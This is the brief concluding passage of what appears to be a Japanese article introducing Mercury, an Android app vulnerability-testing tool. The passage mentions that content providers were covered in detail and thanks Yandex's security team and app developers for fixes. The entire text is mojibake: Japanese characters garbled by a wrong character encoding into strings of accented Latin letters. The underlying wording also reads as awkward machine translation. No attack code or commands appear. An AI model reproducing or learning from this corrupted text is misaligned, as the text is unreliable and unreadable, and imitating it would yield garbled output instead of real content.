ãã®èšäºã§ã¯ãAndroidã¢ããªã±ãŒã·ã§ã³ã®è匱æ§ãæ€çŽ¢ããããã®æ±çšããŒã«ã§ããæ°Žéã«åºäŒããŸããã Androidã¢ããªã±ãŒã·ã§ã³ã®äžéšã§ããã³ã³ãã³ããããã€ããŒã®æäœæ¹æ³ã詳现ã«æ€èšããŸããã ã¢ã¯ãã£ããã£ããµãŒãã¹ãããã³ãããŒããã£ã¹ãã¬ã·ãŒããŒã¯ç¹ç¯ããŸããã å°æ¥ãçºèŠãããè匱æ§ã®äŸã«ããããã®ã¿ã€ãã®è匱æ§ã«æ°Žéã䜿çšããæ¹æ³ãèŠã€ããŠç€ºãããšãèšç»ãããŠããŸãã ãŸããåæã®ããã«ä»ã®ããã°ã©ã ããã詳ããç¥ãããšãèšç»ãããŠããŸãã
è¿ éãªå¯Ÿå¿ãããŠãããYandexã»ãã¥ãªãã£éšéã®å°é家ã«æè¬ããŸãïŒ ãããŠãã¢ããªã±ãŒã·ã§ã³éçºè -é ããæ¬åœã ;ïŒèŠã€ãã£ãèå¥ã®ä¿®æ£ã